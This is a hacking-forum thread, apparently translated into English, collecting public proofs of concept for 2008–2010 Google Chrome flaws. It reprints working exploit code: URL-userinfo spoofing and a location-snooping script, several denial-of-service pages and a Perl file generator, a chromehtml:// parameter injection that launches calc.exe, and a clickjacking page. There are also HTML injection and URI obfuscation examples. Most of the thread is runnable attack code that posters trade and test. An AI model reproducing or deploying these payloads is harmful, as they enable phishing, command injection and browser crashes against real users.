Author
Topic: [°] Collection of Bugs/Exploits in Google Chrome win32 (Read 25,994 times)
MabUse
Offline
Posts: 1
<script>
var snoopWin;
function run() {
  // "www.gmail.com" is only the userinfo part of the URL; the host really opened is foro.elhacker.net
  snoopWin = window.open('http://www.gmail.com@foro.elhacker.net/', 'snoopWindow', 'width=640,height=480');
  snoopWin.blur();
  setTimeout("snoopy()", 1000);
}
function snoopy() {
  // Poll the opened window's location every 100 ms
  alert(snoopWin.location);
  setTimeout("snoopy()", 100);
}
</script>
<a href="javascript:run();">http://www.google.com/</a>

But, if:

<script>
var snoopWin;
function run() {
  snoopWin = window.open('http://www.gmail.com@foro.elhacker.net/', 'snoopWindow', 'width=640,height=480');
  snoopWin.blur();
  setTimeout("snoopy()", 1000);
}
function snoopy() {
  // Same PoC, polling every 1000 ms instead of 100 ms
  alert(snoopWin.location);
  setTimeout("snoopy()", 1000);
}
</script>
<a href="javascript:run();">http://www.google.com/</a>
berz3k
Portal dedicated to Chrome vulnerabilities:
Google Chrome Silent Crash Exploit
Google Chrome Inspect Element DoS Exploit
Google Chrome Buffer Overflow
Google Chrome Invalid URL Crash
Google Chrome Omnibox Keylogger
Google Chrome Comic Book
Uninstalling Chrome - Is it something we said.
Google Chrome Carpet Bombing Vulnerability
Chrome Keyboard Shortcuts
Chrome Easter Eggs
Google Chrome Released

The comics are very funny, and so are the Chrome Easter Eggs; like every program it hides the credits and other surprises, but also information that is valuable to an attacker:
about:internets
about:version
about:stats
about:memory
about:plugins
about:histograms
about:cache
about:dns
about:network
about:crash
about:hang (can crash your browser)
about:% (can crash your browser)

I found it quite interesting, running "about:memory", how much memory Firefox consumes compared to Chrome.
Source: http://chromekb.com
-berz3k.
WHK
吴阿卡
Global Moderator
 
Offline
Posts: 3,944
The Hacktivism is not a crime
The site looks good. http://chromekb.com/vulnerabilities/"><h1>ARREGLENMEE!</h1> Source: http://www.jccharry.com/fake/1.txt
« Last edited: 9 September 2008, 08:58 by WHK »
berz3k
Google fixes vulnerabilities in its Chrome browser

Google Releases New Browser Chrome - Vulnerabilities on First Day

So as most of you probably know, the big buzz on the Internet last week was that Google (after supporting Firefox for so long) have actually launched their own browser. It's called Google Chrome. Now of course, in typical Google fashion, they call it BETA software, and a number of flaws have popped up during the first couple of days of release. One cool thing though is that each tab runs its own threaded process, so if one tab bombs out it won't take down your whole browser. The browser is a move for Google into the online/offline integration they started with Google Desktop; there are more and more online apps (Google Office) that people still want to use offline, and with a Google-made browser this will be possible. You also have to consider the privacy implications though: if you are also using Gmail, Google will basically know everything you do; even worse, if you also use Google Desktop they will know what you have on your computer, what e-mail you send and receive, and what you surf on the web.

Curious video where German citizens won't be using Chrome, I forgot to post it before: http://valleywag.com/5046665/german-government-tells-citizens-not-to-use-google-chrome

We'll have to test the new Chrome stuff. -berz3k.
« Last edited: 25 September 2008, 03:16 by berz3k »
berz3k
New exploit on milw0rm. Affected versions:
Chrome/0.2.149.29 Chrome/0.2.149.30

<html>
<head>
<title>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.</title>
<script language="javascript">
// Open windows whose URL is nothing but CR/LF characters; watch memory use while it runs.
window.open("\r\n\r\n");
window.refresh(); // not a standard DOM method; kept as in the original PoC
window.open("\r\n\r\n");
</script>
</head>
<body>
<br><br>
<h2><center>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Denial of Service.<br><br>Proof of Concept</center></h2>
<center>
<b>Note:: Keep an eye on the memory consumption in Task Manager.</b><br><br>
<hr>
<b>This POC has been designed with minimum object usage. This can be made more critical when combined with a number of objects. For example: using the alert function will make it more exhaustive.</b><br><br>
<b><br>Aditya K Sood<br>(c) SecNiche Security.<br><a href="http://www.secniche.org">http://www.secniche.org</a></b>
<hr>
</center>
<b>Version Tested:<br><br>
Official Build 1798<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br>
AppleWebKit/525.13 (KHTML, like Gecko)<br>
Chrome/0.2.149.29 Safari/525.13<br><br>
Official Build 2200<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br>
AppleWebKit/525.13 (KHTML, like Gecko)<br>
Chrome/0.2.149.30 Safari/525.13</b>
<hr>
</body>
</html>
-berz3k.
berz3k
Affected versions:
Chrome/0.2.149.30 Chrome/0.2.149.29 Chrome/0.2.149.27
Source: http://www.milw0rm.com/exploits/6609

Remote DoS Exploit:
<html>
<head>
<title>Google Chrome Window Object Suppressing Remote Denial of Service.</title>
</head>
<!-- window.close() fired from onload on a window that no script opened -->
<body onLoad="window.close();">
<center>
<b>Note: Design Flaw. Zero Security Check. Script Can Be Used to Kill Parent Window Directly Leading to Denial of Service.</b><br><br>
</center>
</body>
</html>
 
« Last edited: 30 September 2008, 03:40 by berz3k »
berz3k
Google Chrome MetaCharacter URI Obfuscation Vulnerability

Google Chrome is vulnerable to a URI obfuscation vulnerability. An attacker can easily perform malicious redirection by manipulating the browser functionality. The link cannot be traversed properly in the status/address bar. This could facilitate the impersonation of legitimate web sites in order to steal sensitive information from unsuspecting users. A URI specified with the @ character, with or without a NULL character, causes the vulnerability.

Vulnerable Systems:
* Chrome version 0.2.149.30
* Chrome version 0.2.149.29
* Chrome version 0.2.149.27

Proof of Concept:
Link1: http://ftp://anoymous:guest@microsoft.com
Link2: [Without NULL] http://www.google.com@yahoo.com  [Google --> Yahoo [Obfuscation]]
Link3: [With NULL] http://www.secniche.org%00@www.milw0rm.com  [SecNiche --> Milw0rm [Obfuscation]]

Source: http://www.secniche.org/gcuri/index.html
-berz3k.
berz3k
New exploit 23.12.2008
Vulnerable Systems:
* Chrome version 1.0.154.36
Google Chrome Browser (ChromeHTML://) Remote Parameter Injection
Source: http://www.milw0rm.com

<!--
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches: http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html
click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>

It doesn't work on Windows Vista SP1; can someone confirm the bug on XP SP3 with a PoC. -berz3k.
Novlucker
Ninja y
Ex-Staff
Offline
Posts: 10,225
If I were you I'd think twice
Well, good thing berz3k posted a few days ago, so I avoid having to revive an old thread. Curiosity: has anyone "played" with the final/stable version of Chrome and the bugs found in this thread? I'd like to know whether the Google folks have fixed anything or whether these errors remain; otherwise I'll have to try it myself. Regards
Help keep the forum clean, report the "lost causes" to a MOD XD http://twitter.com/novlucker "Two things are infinite: the Universe and human stupidity. And I'm not so sure about the first." Albert Einstein
berz3k
@Novlucker The vast majority are fixed (I've played with all of them), except for this last one, which I tested on Vista; oh well, I know it's a bug that affects XP SP3, I'll have to revive my old laptop. -berz3k.
THAL
Offline
Posts: 58
Once Google Chrome is open, when I search for any topic I get this error:
mc7cQ7Hk���S��"�:�n�.����XP
or this one:
mc7cQ7Hk���S��"�3�g�'����1N
Any suggestions?
berz3k
@THAL Which version have you installed, Linux/Win32? It most likely didn't install correctly; post me a screenshot and the steps you run so I can understand the bug.
-berz3k.
berz3k
New exploit 23.01.2009
Vulnerable Systems:
* Chrome version 1.0.154.43
Google Chrome 1.0.154.43 ClickJacking Vulnerability (2009-01-23)
Source: http://www.milw0rm.com/exploits/7903

<html>
<style type="text/css">
<!--
.style1 { font-size: 50px; font-weight: bold; }
.style2 { color: #FF0000; font-weight: bold; font-size: 24px; }
-->
</style>
<body>
<span class="style2">x0x</span>
<!-- A tiny white div that is moved under the cursor on click; hovering it navigates away -->
<div class="style1" id="open" style="position:absolute; width:8px; height:7px; background:#FFFFFF; border:1px; left: 19px; top: 115px;" onmouseover="document.location='http://www.cyber-warrior.org/x0x';">This</div>
<p><strong>
<script>
function updatebox(evt) {
  // Place the invisible div 2px up-left of the pointer (unitless values work because the page is in quirks mode)
  mouseX = evt.pageX ? evt.pageX : evt.clientX;
  mouseY = evt.pageY ? evt.pageY : evt.clientY;
  document.getElementById('open').style.left = mouseX - 2;
  document.getElementById('open').style.top = mouseY - 2;
}
</script>
</strong><a href="http://www.haber7.com/haber.asp?id=11111" onClick="updatebox(event)"><font style="font-family:arial;font-size:32px">haber icin tiklayiniz</font></a></p>
<p><br></p>
</body>
</html>

Hmmm, does it work for everyone? It seems to me it isn't running properly; does anyone have more details? -berz3k.
berz3k
New DoS PoC 2010-01-03
Google Chrome 4.0.249.30 DoS PoC
Source: http://www.exploit-db.com/exploits/10960
Exploit:

#!/usr/bin/perl
# google chrome 4.0.249.30 DoS PoC
#
# Author: Teo Manojlovic
#
# Info: In ordinary cases the browser would redirect to "http://www.google.com",
# but in this case the browser will report an error for something that should
# be possible and is possible in other browsers.
#
# I would like to thank Jeremy Brown who made a very nice fuzzer for browsers
#
# (Original remark, translated from Croatian: still, the guy isn't as much of a
# hick as I thought he was, because his pdf fuzzer kind of sucks.)
use strict;
use warnings;

my $file = "poc.html";
my $poc  = 'a/' x 10000000;   # roughly 20 MB of attribute value

open(my $fh, '>>', $file) or die "cannot open $file: $!";
print $fh '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>';
print $fh "<body alink=";
print $fh $poc;
print $fh '">';
close($fh);
print "Finished\n";

PoC DoS. I tested it on version 3.0.195.38; I haven't updated. Post a link to download version 4.0.249.30 so this PoC can be tested. -berz3k.